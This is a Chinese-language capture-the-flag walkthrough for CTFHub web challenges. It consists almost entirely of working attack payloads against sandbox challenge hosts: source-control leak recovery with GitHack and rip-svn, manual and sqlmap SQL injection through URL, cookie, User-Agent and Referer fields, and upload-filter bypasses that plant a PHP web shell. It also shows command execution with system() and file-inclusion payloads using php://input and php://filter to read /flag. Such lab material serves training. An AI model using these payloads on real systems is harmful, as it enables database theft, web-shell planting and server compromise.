在kali中使用GitHack
python GitHack.py http://challenge-4be834ffe995c3a3.sandbox.ctfhub.com:10800/.git
//日志文件会保存到GitHack目录中的dist目录下
git log
git diff 91722f3ef9cad1bb2841623dd18efcf5966dbd32
//查看flag
git stash list
git stash pop //注意要用root权限
python2 GitHack.py http://challenge-b30f32f8760f958c.sandbox.ctfhub.com:10800/.git
//先进入工具目录
./rip-svn.pl -v -u http://challenge-db225928ae10d29a.sandbox.ctfhub.com:10800/.svn
ls -al
cd .svn
cd pristine
cd 87
ls -al
cat 87cfa68f3ad388cc5010e87eb92ae7210a6564c9.svn-base
./rip-hg.pl -v -u http://challenge-fd4d14ab800ba8d3.sandbox.ctfhub.com:10800/.hg/
cd .hg
cd store
cat fncache
//得到data/flag_1296924402.txt.i,直接网址访问该文件
http://challenge-eafda9687e63cd2f.sandbox.ctfhub.com:10800/?id=1 order by 2
http://challenge-eafda9687e63cd2f.sandbox.ctfhub.com:10800/?id=-1%20union%20select%201,2
http://challenge-eafda9687e63cd2f.sandbox.ctfhub.com:10800/?id=-1%20union%20select%201,database()
http://challenge-eafda9687e63cd2f.sandbox.ctfhub.com:10800/?id=-1%20union%20select%201,group_concat(schema_name) from information_schema.schemata
http://challenge-eafda9687e63cd2f.sandbox.ctfhub.com:10800/?id=-1%20union%20select%201,group_concat(table_name)from information_schema.tables where table_schema='sqli'
http://challenge-eafda9687e63cd2f.sandbox.ctfhub.com:10800/?id=-1%20union%20select%201,group_concat(column_name)from information_schema.columns where table_name='flag' and table_schema='sqli'
http://challenge-eafda9687e63cd2f.sandbox.ctfhub.com:10800/?id=-1%20union%20select%201,group_concat(flag)from sqli.flag
#用Sqlmap辅助
py sqlmap.py -u http://challenge-a3af26520d93d2b0.sandbox.ctfhub.com:10800/?id=1 --current-db
py sqlmap.py -u http://challenge-a3af26520d93d2b0.sandbox.ctfhub.com:10800/?id=1 -dbs
py sqlmap.py -u http://challenge-a3af26520d93d2b0.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables --batch
py sqlmap.py -u http://challenge-a3af26520d93d2b0.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag --columns --batch
py sqlmap.py -u http://challenge-a3af26520d93d2b0.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump
1、加单引号报错
http://challenge-910e90134305b344.sandbox.ctfhub.com:10800/?id=1'
2、加'and 1=1 -- '
http://challenge-910e90134305b344.sandbox.ctfhub.com:10800/?id=1'and 1=1 -- '
//这种注释符后边有一个空格
3、加'and 1=2 -- '--报错
通过以上三步就可以判定是字符型注入
order by 如果超出它的列数,则报错;如果恰好等于列数,显示$id=1的结果
http://challenge-910e90134305b344.sandbox.ctfhub.com:10800/?id=1' order by 2 -- '
判断回显位置
http://challenge-40f83968f2fd5abd.sandbox.ctfhub.com:10800/?id=-1' union select 1,2 -- ''
开始查数据
http://challenge-40f83968f2fd5abd.sandbox.ctfhub.com:10800/?id=-1' union select 1,user() -- ''
http://challenge-40f83968f2fd5abd.sandbox.ctfhub.com:10800/?id=-1' union select 1,version() -- ''
http://challenge-40f83968f2fd5abd.sandbox.ctfhub.com:10800/?id=-1' union select 1,database() -- ''
http://challenge-40f83968f2fd5abd.sandbox.ctfhub.com:10800/?id=-1' union select 1,group_concat(schema_name)from information_schema.schemata -- ''
http://challenge-40f83968f2fd5abd.sandbox.ctfhub.com:10800/?id=-1' union select 1,group_concat(table_name)from information_schema.tables where table_schema='sqli' -- ''
http://challenge-40f83968f2fd5abd.sandbox.ctfhub.com:10800/?id=-1' union select 1,group_concat(column_name)from information_schema.columns where table_schema='sqli' and table_name='flag' -- ''
http://challenge-40f83968f2fd5abd.sandbox.ctfhub.com:10800/?id=-1' union select 1,group_concat(flag)from sqli.flag -- ''
#用sqlmap辅助注入
py sqlmap.py -u http://challenge-a766a179b69b22b7.sandbox.ctfhub.com:10800/?id=1 --batch
py sqlmap.py -u http://challenge-a766a179b69b22b7.sandbox.ctfhub.com:10800/?id=1 -dbs --batch
py sqlmap.py -u http://challenge-a766a179b69b22b7.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump --batch
http://challenge-fb5b1d2dccdf80f6.sandbox.ctfhub.com:10800/?id=1 union select updatexml(1,concat(0x7e,database(),0x7e),1)
http://challenge-fb5b1d2dccdf80f6.sandbox.ctfhub.com:10800/?id=1 union select updatexml(1,concat(0x7e,(select(group_concat(table_name))from information_schema.tables where table_schema="sqli") ,0x7e),1)
http://challenge-fb5b1d2dccdf80f6.sandbox.ctfhub.com:10800/?id=1 union select updatexml(1,concat(0x7e,(select(group_concat(column_name))from information_schema.columns where table_schema="sqli" and table_name='flag') ,0x7e),1)
#得到flag的左半段(因为回显长度受限)
http://challenge-fb5b1d2dccdf80f6.sandbox.ctfhub.com:10800/?id=1 union select updatexml(1,concat(0x7e,(select(group_concat(flag))from sqli.flag) ,0x7e),1)
#用right()将后半段显示出来
http://challenge-fb5b1d2dccdf80f6.sandbox.ctfhub.com:10800/?id=1 union select updatexml(1,concat(0x7e,right((select(group_concat(flag))from sqli.flag) ,31),0x7e),1)
#用sqlmap辅助注入
py sqlmap.py -u http://challenge-a766a179b69b22b7.sandbox.ctfhub.com:10800/?id=1 --batch
py sqlmap.py -u http://challenge-a766a179b69b22b7.sandbox.ctfhub.com:10800/?id=1 -dbs --batch
py sqlmap.py -u http://challenge-a766a179b69b22b7.sandbox.ctfhub.com:10800/?id=1 -D sqli -T flag -C flag --dump --batch
#这两种建议使用BP或者sqlmap辅助注入
#使用sqlmap
py sqlmap.py -u http://challenge-54100b7c311a20fc.sandbox.ctfhub.com:10800/ --cookie "id=1" --level=2 --dbs
py sqlmap.py -u http://challenge-54100b7c311a20fc.sandbox.ctfhub.com:10800/ --cookie "id=1" --level=2 -D sqli --tables --batch
py sqlmap.py -u http://challenge-54100b7c311a20fc.sandbox.ctfhub.com:10800/ --cookie "id=1" --level=2 -D sqli -T ktyrpqqkjq -C dmcwxicbvc --dump
#使用BP
GET / HTTP/1.1
Host: challenge-3d139840b13c5363.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: id=-1 union select 0,group_concat(column_name)from information_schema.columns where table_schema='sqli' and table_name='tjhiangrvk'; hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
GET / HTTP/1.1
Host: challenge-3d139840b13c5363.sandbox.ctfhub.com:10800
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:100.0) Gecko/20100101 Firefox/100.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Cookie: id=-1 union select 0,igdqkfgoxs from sqli.tjhiangrvk; hint=id%E8%BE%93%E5%85%A51%E8%AF%95%E8%AF%95%EF%BC%9F
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
#sqlmap
py sqlmap.py -u http://challenge-55ef2e5d41014290.sandbox.ctfhub.com:10800/ --level=3 --dbs --batch
py sqlmap.py -u http://challenge-55ef2e5d41014290.sandbox.ctfhub.com:10800/ --level=3 -D sqli -T dgcskfxmlw --dump --batch
#BP
GET / HTTP/1.1
Host: challenge-6b012852328af0f2.sandbox.ctfhub.com:10800
User-Agent: -1 union select 1,group_concat(column_name)from information_schema.columns where table_schema='sqli' and table_name='wexbewzepo' #
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
GET / HTTP/1.1
Host: challenge-6b012852328af0f2.sandbox.ctfhub.com:10800
User-Agent: -1 union select 1,sxuftpsmzo from sqli.wexbewzepo #
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
Pragma: no-cache
Cache-Control: no-cache
#sqlmap 把level提高到5,时间可能会有点长
py sqlmap.py -u http://challenge-55ef2e5d41014290.sandbox.ctfhub.com:10800/ --level=5 --dbs --batch
#BP要先POST数据,然后再抓包,才会有Refer
POST / HTTP/1.1
Host: challenge-c07172b49c84c52f.sandbox.ctfhub.com:10800
Content-Length: 4
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36
Origin: http://challenge-c07172b49c84c52f.sandbox.ctfhub.com:10800
Content-Type: application/x-www-form-urlencoded
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: -1 union select 1,group_concat(fxjlcnquao)from sqli.jutobmzrfj
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
id=1
#sqlmap
py sqlmap.py -u http://challenge-9f6b26b103520285.sandbox.ctfhub.com:10800/?id=1 -D sqli --tables --tamper space2comment.py
以下省略
#手工注入
绕过空格过滤的方式: /**/、()、%0a
POST / HTTP/1.1
Host: challenge-9424bb26b9b28c71.sandbox.ctfhub.com:10800
Content-Length: 311
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36
Origin: http://challenge-9424bb26b9b28c71.sandbox.ctfhub.com:10800
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarypThKx4ZJTFtPj3di
#这里是给出服务器表单的开始和结束的位置,不是验证文件类型的
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://challenge-9424bb26b9b28c71.sandbox.ctfhub.com:10800/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundarypThKx4ZJTFtPj3di
Content-Disposition: form-data; name="file"; filename="muma.php"
Content-Type: image/jpeg
#改这里!!!这里才是验证文件类型的地方
------WebKitFormBoundarypThKx4ZJTFtPj3di
Content-Disposition: form-data; name="submit"
Submit
------WebKitFormBoundarypThKx4ZJTFtPj3di--
BP抓包上传muma.php并修改请求报文即可
POST /?road=/var/www/html/upload/muma.php%00.jpg HTTP/1.1
#改这里!!!
Host: challenge-8a75a2e89de80f4b.sandbox.ctfhub.com:10800
Content-Length: 318
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://challenge-8a75a2e89de80f4b.sandbox.ctfhub.com:10800
Content-Type: multipart/form-data; boundary=----WebKitFormBoundarygRXig2JtdVHb7oLO
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Referer: http://challenge-8a75a2e89de80f4b.sandbox.ctfhub.com:10800/?road=/var/www/html/upload/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
------WebKitFormBoundarygRXig2JtdVHb7oLO
Content-Disposition: form-data; name="file"; filename="muma.php%00.jpg"
Content-Type: image/jpeg
------WebKitFormBoundarygRXig2JtdVHb7oLO
Content-Disposition: form-data; name="submit"
Submit
------WebKitFormBoundarygRXig2JtdVHb7oLO--
然后蚁剑连接网址+upload/muma.php
#php里套个php
gif文件用记事本打开,在后面加一句话木马
然后bp抓包改文件后缀
http://challenge-762e9e51ed72cd7d.sandbox.ctfhub.com:10800/?cmd=system("ls /");
http://challenge-762e9e51ed72cd7d.sandbox.ctfhub.com:10800/?cmd=system("cat /flag_6055");
#源代码中有include先包含目录中自带的shell.txt
http://challenge-d95f20cfaac12c8b.sandbox.ctfhub.com:10800/?file=shell.txt
#然后POST数据
ctfhub=system("ls /");
ctfhub=system("cat /flag");
#BP抓包,然后改为POST请求并加入php:/input伪协议,再传入php指令
POST /?file=php://input HTTP/1.1
Host: challenge-8a0b4a527d4aa825.sandbox.ctfhub.com:10800
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
Content-Type:application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Length: 33
#知道了flag在/flag中
所以直接构造url http://challenge-f9c9636bfed0d1bb.sandbox.ctfhub.com:10800/?file=php://filter/resource=/flag
#或者可以用base64编码输出
http://challenge-f9c9636bfed0d1bb.sandbox.ctfhub.com:10800/?file=php://filter/read=convert.base64-encode/resource=/flag